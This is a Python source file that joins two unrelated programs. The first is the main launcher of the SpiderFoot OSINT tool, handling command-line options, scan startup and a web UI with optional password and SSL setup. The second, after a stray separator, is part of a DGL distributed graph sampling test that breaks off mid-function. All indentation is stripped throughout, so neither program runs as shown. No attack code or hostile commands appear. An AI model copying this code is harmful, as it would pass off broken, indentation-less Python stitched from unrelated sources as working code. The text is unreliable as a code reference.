# Purpose: Main wrapper for calling all SpiderFoot modules
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 03/04/2012
# Copyright: (c) Steve Micallef 2012
# Licence: MIT
# -------------------------------------------------------------------------------
import argparse
import logging
import multiprocessing as mp
import os
import os.path
import random
import signal
import sys
import time
from copy import deepcopy
import cherrypy
import cherrypy_cors
from cherrypy.lib import auth_digest
from sflib import SpiderFoot
from sfscan import startSpiderFootScanner
from sfwebui import SpiderFootWebUi
from spiderfoot import SpiderFootHelpers
from spiderfoot import SpiderFootDb
from spiderfoot import SpiderFootCorrelator
from spiderfoot.logger import logListenerSetup, logWorkerSetup
from spiderfoot import __version__
scanId = None
dbh = None
def main() -> None:
# web server config
sfWebUiConfig = {
'host': '127.0.0.1',
'port': 5001,
'root': '/',
'cors_origins': [],
}
# 'Global' configuration options
# These can be overriden on a per-module basis, and some will
# be overridden from saved configuration settings stored in the DB.
sfConfig = {
'_debug': False, # Debug
'_maxthreads': 3, # Number of modules to run concurrently
'__logging': True, # Logging in general
'__outputfilter': None, # Event types to filter from modules' output
'_useragent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', # User-Agent to use for HTTP requests
'_dnsserver': '', # Override the default resolver
'_fetchtimeout': 5, # number of seconds before giving up on a fetch
'_internettlds': 'https://publicsuffix.org/list/effective_tld_names.dat',
'_internettlds_cache': 72,
'_genericusers': "abuse,admin,billing,compliance,devnull,dns,ftp,hostmaster,inoc,ispfeedback,ispsupport,list-request,list,maildaemon,marketing,noc,no-reply,noreply,null,peering,peering-notify,peering-request,phish,phishing,postmaster,privacy,registrar,registry,root,routing-registry,rr,sales,security,spam,support,sysadmin,tech,undisclosed-recipients,unsubscribe,usenet,uucp,webmaster,www",
'__database': f"{SpiderFootHelpers.dataPath()}/spiderfoot.db",
'__modules__': None, # List of modules. Will be set after start-up.
'__correlationrules__': None, # List of correlation rules. Will be set after start-up.
'_socks1type': '',
'_socks2addr': '',
'_socks3port': '',
'_socks4user': '',
'_socks5pwd': '',
}
sfOptdescs = {
'_debug': "Enable debugging?",
'_maxthreads': "Max number of modules to run concurrently",
'_useragent': "User-Agent string to use for HTTP requests. Prefix with an '@' to randomly select the User Agent from a file containing user agent strings for each request, e.g. @C:\\useragents.txt or @/home/bob/useragents.txt. Or supply a URL to load the list from there.",
'_dnsserver': "Override the default resolver with another DNS server. For example, 8.8.8.8 is Google's open DNS server.",
'_fetchtimeout': "Number of seconds before giving up on a HTTP request.",
'_internettlds': "List of Internet TLDs.",
'_internettlds_cache': "Hours to cache the Internet TLD list. This can safely be quite a long time given that the list doesn't change too often.",
'_genericusers': "List of usernames that if found as usernames or as part of e-mail addresses, should be treated differently to non-generics.",
'_socks1type': "SOCKS Server Type. Can be '4', '5', 'HTTP' or 'TOR'",
'_socks2addr': 'SOCKS Server IP Address.',
'_socks3port': 'SOCKS Server TCP Port. Usually 1080 for 4/5, 8080 for HTTP and 9050 for TOR.',
'_socks4user': 'SOCKS Username. Valid only for SOCKS4 and SOCKS5 servers.',
'_socks5pwd': "SOCKS Password. Valid only for SOCKS5 servers.",
'_modulesenabled': "Modules enabled for the scan." # This is a hack to get a description for an option not actually available.
}
# Legacy way to run the server
args = None
p = argparse.ArgumentParser(description=f"SpiderFoot {__version__}: Open Source Intelligence Automation.")
p.add_argument("-d", "--debug", action='store_true', help="Enable debug output.")
p.add_argument("-l", metavar="IP:port", help="IP and port to listen on.")
p.add_argument("-m", metavar="mod1,mod2,...", type=str, help="Modules to enable.")
p.add_argument("-M", "--modules", action='store_true', help="List available modules.")
p.add_argument("-C", "--correlate", metavar="scanID", help="Run correlation rules against a scan ID.")
p.add_argument("-s", metavar="TARGET", help="Target for the scan.")
p.add_argument("-t", metavar="type1,type2,...", type=str, help="Event types to collect (modules selected automatically).")
p.add_argument("-u", choices=["all", "footprint", "investigate", "passive"], type=str, help="Select modules automatically by use case")
p.add_argument("-T", "--types", action='store_true', help="List available event types.")
p.add_argument("-o", choices=["tab", "csv", "json"], type=str, help="Output format. Tab is default.")
p.add_argument("-H", action='store_true', help="Don't print field headers, just data.")
p.add_argument("-n", action='store_true', help="Strip newlines from data.")
p.add_argument("-r", action='store_true', help="Include the source data field in tab/csv output.")
p.add_argument("-S", metavar="LENGTH", type=int, help="Maximum data length to display. By default, all data is shown.")
p.add_argument("-D", metavar='DELIMITER', type=str, help="Delimiter to use for CSV output. Default is ,.")
p.add_argument("-f", action='store_true', help="Filter out other event types that weren't requested with -t.")
p.add_argument("-F", metavar="type1,type2,...", type=str, help="Show only a set of event types, comma-separated.")
p.add_argument("-x", action='store_true', help="STRICT MODE. Will only enable modules that can directly consume your target, and if -t was specified only those events will be consumed by modules. This overrides -t and -m options.")
p.add_argument("-q", action='store_true', help="Disable logging. This will also hide errors!")
p.add_argument("-V", "--version", action='store_true', help="Display the version of SpiderFoot and exit.")
p.add_argument("-max-threads", type=int, help="Max number of modules to run concurrently.")
args = p.parse_args()
if args.version:
print(f"SpiderFoot {__version__}: Open Source Intelligence Automation.")
sys.exit(0)
if args.max_threads:
sfConfig['_maxthreads'] = args.max_threads
if args.debug:
sfConfig['_debug'] = True
else:
sfConfig['_debug'] = False
if args.q:
sfConfig['__logging'] = False
loggingQueue = mp.Queue()
logListenerSetup(loggingQueue, sfConfig)
logWorkerSetup(loggingQueue)
log = logging.getLogger(f"spiderfoot.{__name__}")
sft = SpiderFoot(sfConfig)
# Add descriptions of the global config options
sfConfig['__globaloptdescs__'] = sfOptdescs
# Load each module in the modules directory with a .py extension
try:
mod_dir = sft.myPath() + '/modules/'
sfModules = SpiderFootHelpers.loadModulesAsDict(mod_dir)
except BaseException as e:
log.critical(f"Failed to load modules: {e}", exc_info=True)
sys.exit(-1)
if not sfModules:
log.critical(f"No modules found in modules directory: {mod_dir}")
sys.exit(-1)
# Load each correlation rule in the correlations directory with
# a .yaml extension
try:
correlations_dir = sft.myPath() + '/correlations/'
correlationRulesRaw = SpiderFootHelpers.loadCorrelationRulesRaw(correlations_dir)
except BaseException as e:
log.critical(f"Failed to load correlation rules: {e}", exc_info=True)
sys.exit(-1)
# Initialize database handle
try:
dbh = SpiderFootDb(sfConfig)
except Exception as e:
log.critical(f"Failed to initialize database: {e}", exc_info=True)
sys.exit(-1)
# Sanity-check the rules and parse them
sfCorrelationRules = list()
if not correlationRulesRaw:
log.error(f"No correlation rules found in correlations directory: {correlations_dir}")
else:
try:
correlator = SpiderFootCorrelator(dbh, correlationRulesRaw)
sfCorrelationRules = correlator.get_ruleset()
except Exception as e:
log.critical(f"Failure initializing correlation rules: {e}", exc_info=True)
sys.exit(-1)
# Add modules and correlation rules to sfConfig so they can be used elsewhere
sfConfig['__modules__'] = sfModules
sfConfig['__correlationrules__'] = sfCorrelationRules
if args.correlate:
if not correlationRulesRaw:
log.error("Unable to perform correlations as no correlation rules were found.")
sys.exit(-1)
try:
log.info(f"Running {len(correlationRulesRaw)} correlation rules against scan, {args.correlate}.")
corr = SpiderFootCorrelator(dbh, correlationRulesRaw, args.correlate)
corr.run_correlations()
except Exception as e:
log.critical(f"Unable to run correlation rules: {e}", exc_info=True)
sys.exit(-1)
sys.exit(0)
if args.modules:
log.info("Modules available:")
for m in sorted(sfModules.keys()):
if "__" in m:
continue
print(('{0:25} {1}'.format(m, sfModules[m]['descr'])))
sys.exit(0)
if args.types:
dbh = SpiderFootDb(sfConfig, init=True)
log.info("Types available:")
typedata = dbh.eventTypes()
types = dict()
for r in typedata:
types[r[1]] = r[0]
for t in sorted(types.keys()):
print(('{0:45} {1}'.format(t, types[t])))
sys.exit(0)
if args.l:
try:
(host, port) = args.l.split(":")
except BaseException:
log.critical("Invalid ip:port format.")
sys.exit(-1)
sfWebUiConfig['host'] = host
sfWebUiConfig['port'] = port
start_web_server(sfWebUiConfig, sfConfig, loggingQueue)
sys.exit(0)
start_scan(sfConfig, sfModules, args, loggingQueue)
def start_scan(sfConfig: dict, sfModules: dict, args, loggingQueue) -> None:
"""Start scan
Args:
sfConfig (dict): SpiderFoot config options
sfModules (dict): modules
args (argparse.Namespace): command line args
loggingQueue (Queue): main SpiderFoot logging queue
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
global dbh
global scanId
dbh = SpiderFootDb(sfConfig, init=True)
sf = SpiderFoot(sfConfig)
if not args.s:
log.error("You must specify a target when running in scan mode. Try --help for guidance.")
sys.exit(-1)
if args.x and not args.t:
log.error("-x can only be used with -t. Use --help for guidance.")
sys.exit(-1)
if args.x and args.m:
log.error("-x can only be used with -t and not with -m. Use --help for guidance.")
sys.exit(-1)
if args.r and (args.o and args.o not in ["tab", "csv"]):
log.error("-r can only be used when your output format is tab or csv.")
sys.exit(-1)
if args.H and (args.o and args.o not in ["tab", "csv"]):
log.error("-H can only be used when your output format is tab or csv.")
sys.exit(-1)
if args.D and args.o != "csv":
log.error("-D can only be used when using the csv output format.")
sys.exit(-1)
target = args.s
# Usernames and names - quoted on the commandline - won't have quotes,
# so add them.
if " " in target:
target = f"\"{target}\""
if "." not in target and not target.startswith("+") and '"' not in target:
target = f"\"{target}\""
targetType = SpiderFootHelpers.targetTypeFromString(target)
if not targetType:
log.error(f"Could not determine target type. Invalid target: {target}")
sys.exit(-1)
target = target.strip('"')
modlist = list()
if not args.t and not args.m and not args.u:
log.warning("You didn't specify any modules, types or use case, so all modules will be enabled.")
for m in list(sfModules.keys()):
if "__" in m:
continue
modlist.append(m)
signal.signal(signal.SIGINT, handle_abort)
# If the user is scanning by type..
# 1. Find modules producing that type
if args.t:
types = args.t
modlist = sf.modulesProducing(types)
newmods = deepcopy(modlist)
newmodcpy = deepcopy(newmods)
# 2. For each type those modules consume, get modules producing
while len(newmodcpy) > 0:
for etype in sf.eventsToModules(newmodcpy):
xmods = sf.modulesProducing([etype])
for mod in xmods:
if mod not in modlist:
modlist.append(mod)
newmods.append(mod)
newmodcpy = deepcopy(newmods)
newmods = list()
# Easier if scanning by module
if args.m:
modlist = list(filter(None, args.m.split(",")))
# Select modules if the user selected usercase
if args.u:
usecase = args.u[0].upper() + args.u[1:] # Make the first Letter Uppercase
for mod in sfConfig['__modules__']:
if usecase == 'All' or usecase in sfConfig['__modules__'][mod]['group']:
modlist.append(mod)
# Add sfp__stor_stdout to the module list
typedata = dbh.eventTypes()
types = dict()
for r in typedata:
types[r[1]] = r[0]
sfp__stor_stdout_opts = sfConfig['__modules__']['sfp__stor_stdout']['opts']
sfp__stor_stdout_opts['_eventtypes'] = types
if args.f:
if args.f and not args.t:
log.error("You can only use -f with -t. Use --help for guidance.")
sys.exit(-1)
sfp__stor_stdout_opts['_showonlyrequested'] = True
if args.F:
sfp__stor_stdout_opts['_requested'] = args.F.split(",")
sfp__stor_stdout_opts['_showonlyrequested'] = True
if args.o:
if args.o not in ["tab", "csv", "json"]:
log.error("Invalid output format selected. Must be 'tab', 'csv' or 'json'.")
sys.exit(-1)
sfp__stor_stdout_opts['_format'] = args.o
if args.t:
sfp__stor_stdout_opts['_requested'] = args.t.split(",")
if args.n:
sfp__stor_stdout_opts['_stripnewline'] = True
if args.r:
sfp__stor_stdout_opts['_showsource'] = True
if args.S:
sfp__stor_stdout_opts['_maxlength'] = args.S
if args.D:
sfp__stor_stdout_opts['_csvdelim'] = args.D
if args.x:
tmodlist = list()
modlist = list()
xmods = sf.modulesConsuming([targetType])
for mod in xmods:
if mod not in modlist:
tmodlist.append(mod)
# Remove any modules not producing the type requested
rtypes = args.t.split(",")
for mod in tmodlist:
for r in rtypes:
if not sfModules[mod]['provides']:
continue
if r in sfModules[mod].get('provides', []) and mod not in modlist:
modlist.append(mod)
if len(modlist) == 0:
log.error("Based on your criteria, no modules were enabled.")
sys.exit(-1)
modlist += ["sfp__stor_db", "sfp__stor_stdout"]
if sfConfig['__logging']:
log.info(f"Modules enabled ({len(modlist)}): {','.join(modlist)}")
cfg = sf.configUnserialize(dbh.configGet(), sfConfig)
# Debug mode is a variable that gets stored to the DB, so re-apply it
if args.debug:
cfg['_debug'] = True
else:
cfg['_debug'] = False
# If strict mode is enabled, filter the output from modules.
if args.x and args.t:
cfg['__outputfilter'] = args.t.split(",")
# Prepare scan output headers
if args.o == "json":
print("[", end='')
elif not args.H:
delim = "\t"
if args.o == "tab":
delim = "\t"
if args.o == "csv":
if args.D:
delim = args.D
else:
delim = ","
if args.r:
if delim == "\t":
headers = '{0:30}{1}{2:45}{3}{4}{5}{6}'.format("Source", delim, "Type", delim, "Source Data", delim, "Data")
else:
headers = delim.join(["Source", "Type", "Source Data", "Data"])
else:
if delim == "\t":
headers = '{0:30}{1}{2:45}{3}{4}'.format("Source", delim, "Type", delim, "Data")
else:
headers = delim.join(["Source", "Type", "Data"])
print(headers)
# Start running a new scan
scanName = target
scanId = SpiderFootHelpers.genScanInstanceId()
try:
p = mp.Process(target=startSpiderFootScanner, args=(loggingQueue, scanName, scanId, target, targetType, modlist, cfg))
p.daemon = True
p.start()
except BaseException as e:
log.error(f"Scan [{scanId}] failed: {e}")
sys.exit(-1)
# Poll for scan status until completion
while True:
time.sleep(1)
info = dbh.scanInstanceGet(scanId)
if not info:
continue
if info[5] in ["ERROR-FAILED", "ABORT-REQUESTED", "ABORTED", "FINISHED"]:
if sfConfig['__logging']:
log.info(f"Scan completed with status {info[5]}")
if args.o == "json":
print("]")
sys.exit(0)
return
def start_web_server(sfWebUiConfig: dict, sfConfig: dict, loggingQueue=None) -> None:
"""Start the web server so you can start looking at results
Args:
sfWebUiConfig (dict): web server options
sfConfig (dict): SpiderFoot config options
loggingQueue (Queue): main SpiderFoot logging queue
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
web_host = sfWebUiConfig.get('host', '127.0.0.1')
web_port = sfWebUiConfig.get('port', 5001)
web_root = sfWebUiConfig.get('root', '/')
cors_origins = sfWebUiConfig.get('cors_origins', [])
cherrypy.config.update({
'log.screen': False,
'server.socket_host': web_host,
'server.socket_port': int(web_port)
})
log.info(f"Starting web server at {web_host}:{web_port} ...")
sf = SpiderFoot(sfConfig)
# Enable access to static files via the web directory
conf = {
'/query': {
'tools.encode.text_only': False,
'tools.encode.add_charset': True,
},
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'static',
'tools.staticdir.root': f"{sf.myPath()}/spiderfoot"
}
}
secrets = dict()
passwd_file = SpiderFootHelpers.dataPath() + '/passwd'
if os.path.isfile(passwd_file):
if not os.access(passwd_file, os.R_OK):
log.error("Could not read passwd file. Permission denied.")
sys.exit(-1)
with open(passwd_file, 'r') as f:
passwd_data = f.readlines()
for line in passwd_data:
if line.strip() == '':
continue
if ':' not in line:
log.error("Incorrect format of passwd file, must be username:password on each line.")
sys.exit(-1)
u = line.strip().split(":")[0]
p = ':'.join(line.strip().split(":")[1:])
if not u or not p:
log.error("Incorrect format of passwd file, must be username:password on each line.")
sys.exit(-1)
secrets[u] = p
if secrets:
log.info("Enabling authentication based on supplied passwd file.")
conf['/'] = {
'tools.auth_digest.on': True,
'tools.auth_digest.realm': web_host,
'tools.auth_digest.get_ha1': auth_digest.get_ha1_dict_plain(secrets),
'tools.auth_digest.key': random.SystemRandom().randint(0, 99999999)
}
else:
warn_msg = "\n********************************************************************\n"
warn_msg += "Warning: passwd file contains no passwords. Authentication disabled.\n"
warn_msg += "Please consider adding authentication to protect this instance!\n"
warn_msg += "Refer to https://www.spiderfoot.net/documentation/#security.\n"
warn_msg += "********************************************************************\n"
log.warning(warn_msg)
using_ssl = False
key_path = SpiderFootHelpers.dataPath() + '/spiderfoot.key'
crt_path = SpiderFootHelpers.dataPath() + '/spiderfoot.crt'
if os.path.isfile(key_path) and os.path.isfile(crt_path):
if not os.access(crt_path, os.R_OK):
log.critical(f"Could not read {crt_path} file. Permission denied.")
sys.exit(-1)
if not os.access(key_path, os.R_OK):
log.critical(f"Could not read {key_path} file. Permission denied.")
sys.exit(-1)
log.info("Enabling SSL based on supplied key and certificate file.")
cherrypy.server.ssl_module = 'builtin'
cherrypy.server.ssl_certificate = crt_path
cherrypy.server.ssl_private_key = key_path
using_ssl = True
if using_ssl:
url = "https://"
else:
url = "http://"
if web_host == "0.0.0.0": # nosec
url = f"{url}127.0.0.1:{web_port}"
else:
url = f"{url}{web_host}:{web_port}{web_root}"
cors_origins.append(url)
cherrypy_cors.install()
cherrypy.config.update({
'cors.expose.on': True,
'cors.expose.origins': cors_origins,
'cors.preflight.origins': cors_origins
})
print("")
print("*************************************************************")
print(" Use SpiderFoot by starting your web browser of choice and ")
print(f" browse to {url}")
print("*************************************************************")
print("")
# Disable auto-reloading of content
cherrypy.engine.autoreload.unsubscribe()
cherrypy.quickstart(SpiderFootWebUi(sfWebUiConfig, sfConfig, loggingQueue), script_name=web_root, config=conf)
def handle_abort(signal, frame) -> None:
"""Handle interrupt and abort scan.
Args:
signal: TBD
frame: TBD
"""
log = logging.getLogger(f"spiderfoot.{__name__}")
global dbh
global scanId
if scanId and dbh:
log.info(f"Aborting scan [{scanId}] ...")
dbh.scanInstanceSet(scanId, None, None, "ABORTED")
sys.exit(-1)
if __name__ == '__main__':
if sys.version_info < (3, 7):
print("SpiderFoot requires Python 3.7 or higher.")
sys.exit(-1)
if len(sys.argv) <= 1:
print("SpiderFoot requires -l <ip>:<port> to start the web server. Try --help for guidance.")
sys.exit(-1)
# TODO: remove this after a few releases (added in 3.5 pre-release 2021-09-05)
from pathlib import Path
if os.path.exists('spiderfoot.db'):
print(f"ERROR: spiderfoot.db file exists in {os.path.dirname(__file__)}")
print("SpiderFoot no longer supports loading the spiderfoot.db database from the application directory.")
print(f"The database is now loaded from your home directory: {Path.home()}/.spiderfoot/spiderfoot.db")
print(f"This message will go away once you move or remove spiderfoot.db from {os.path.dirname(__file__)}")
sys.exit(-1)
# TODO: remove this after a few releases (added in 3.5 pre-release 2021-09-05)
from pathlib import Path
if os.path.exists('passwd'):
print(f"ERROR: passwd file exists in {os.path.dirname(__file__)}")
print("SpiderFoot no longer supports loading credentials from the application directory.")
print(f"The passwd file is now loaded from your home directory: {Path.home()}/.spiderfoot/passwd")
print(f"This message will go away once you move or remove passwd from {os.path.dirname(__file__)}")
sys.exit(-1)
main()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.data import WN18Dataset
from dgl.distributed import sample_neighbors, sample_etype_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
import pytest
from scipy import sparse as spsp
import random
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name, graph_format=['csc', 'coo']):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1, 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem,
graph_format=graph_format)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
try:
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
except Exception as e:
print(e)
sampled_graph = None
dgl.distributed.exit_client()
return sampled_graph
def start_find_edges_client(rank, tmpdir, disable_shared_mem, eids, etype=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_find_edges.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_find_edges", gpb=gpb)
try:
u, v = dist_graph.find_edges(eids, etype=etype)
except Exception as e:
print(e)
u, v = None, None
dgl.distributed.exit_client()
return u, v
def start_get_degrees_client(rank, tmpdir, disable_shared_mem, nids=None):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt", 1)
dist_graph = DistGraph("test_get_degrees", gpb=gpb)
try:
in_deg = dist_graph.in_degrees(nids)
all_in_deg = dist_graph.in_degrees()
out_deg = dist_graph.out_degrees(nids)
all_out_deg = dist_graph.out_degrees()
except Exception as e:
print(e)
in_deg, out_deg, all_in_deg, all_out_deg = None, None, None, None
dgl.distributed.exit_client()
return in_deg, out_deg, all_in_deg, all_out_deg
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
def check_rpc_find_edges_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges(), size=100))
u, v = g.find_edges(orig_eid[eids])
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids)
du = orig_nid[du]
dv = orig_nid[dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
def create_random_hetero(dense=False, empty=False):
num_nodes = {'n1': 210, 'n2': 200, 'n3': 220} if dense else \
{'n1': 1010, 'n2': 1000, 'n3': 1020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
random.seed(42)
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype] - 10 if empty else num_nodes[src_ntype],
num_nodes[dst_ntype] - 10 if empty else num_nodes[dst_ntype],
density=0.1 if dense else 0.001,
format='coo', random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.ones((g.number_of_nodes('n1'), 10), F.float32, F.cpu())
return g
def check_rpc_hetero_find_edges_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = create_random_hetero()
num_parts = num_server
orig_nid, orig_eid = partition_graph(g, 'test_find_edges', num_parts, tmpdir,
num_hops=1, part_method='metis',
reshuffle=True, return_mapping=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1,
'test_find_edges', ['csr', 'coo']))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
eids = F.tensor(np.random.randint(g.number_of_edges('r1'), size=100))
u, v = g.find_edges(orig_eid['r1'][eids], etype='r1')
du, dv = start_find_edges_client(0, tmpdir, num_server > 1, eids, etype='r1')
du = orig_nid['n1'][du]
dv = orig_nid['n2'][dv]
assert F.array_equal(u, du)
assert F.array_equal(v, dv)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_find_edges_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), num_server)
check_rpc_find_edges_shuffle(Path(tmpdirname), num_server)
def check_rpc_get_degree_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_get_degrees', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_get_degrees'))
p.start()
time.sleep(1)
pserver_list.append(p)
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_get_degrees.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
time.sleep(3)
nids = F.tensor(np.random.randint(g.number_of_nodes(), size=100))
in_degs, out_degs, all_in_degs, all_out_degs = start_get_degrees_client(0, tmpdir, num_server > 1, nids)
print("Done get_degree")
for p in pserver_list:
p.join()
print('check results')
assert F.array_equal(g.in_degrees(orig_nid[nids]), in_degs)
assert F.array_equal(g.in_degrees(orig_nid), all_in_degs)
assert F.array_equal(g.out_degrees(orig_nid[nids]), out_degs)
assert F.array_equal(g.out_degrees(orig_nid), all_out_degs)
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
@pytest.mark.parametrize("num_server", [1, 2])
def test_rpc_get_degree_shuffle(num_server):
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_get_degree_shuffle(Path(tmpdirname), num_server)
#@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
#@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skip('Only support partition with shuffle')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{}\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64, ctx=F.cpu())
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64, ctx=F.cpu())
for i in range(num_server):
part, _, _, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
def start_hetero_sample_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_neighbors(dist_graph, nodes, 3)
block = dgl.to_block(sampled_graph, nodes)
block.edata[dgl.EID] = sampled_graph.edata[dgl.EID]
except Exception as e:
print(e)
block = None
dgl.distributed.exit_client()
return block, gpb
def start_hetero_etype_sample_client(rank, tmpdir, disable_shared_mem, fanout=3,
nodes={'n3': [0, 10, 99, 66, 124, 208]}):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _, _, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dgl.distributed.initialize("rpc_ip_config.txt")
dist_graph = DistGraph("test_sampling", gpb=gpb)
assert 'feat' in dist_graph.nodes['n1'].data
assert 'feat' not in dist_graph.nodes['n2'].data
assert 'feat' not in dist_graph.nodes['n3'].data
if gpb is None:
gpb = dist_graph.get_partition_book()
try:
sampled_graph = sample_etype_neighbors(dist_graph, nodes, dgl.ETYPE, fanout)
block = dgl.to_block(sampled_graph, nodes)
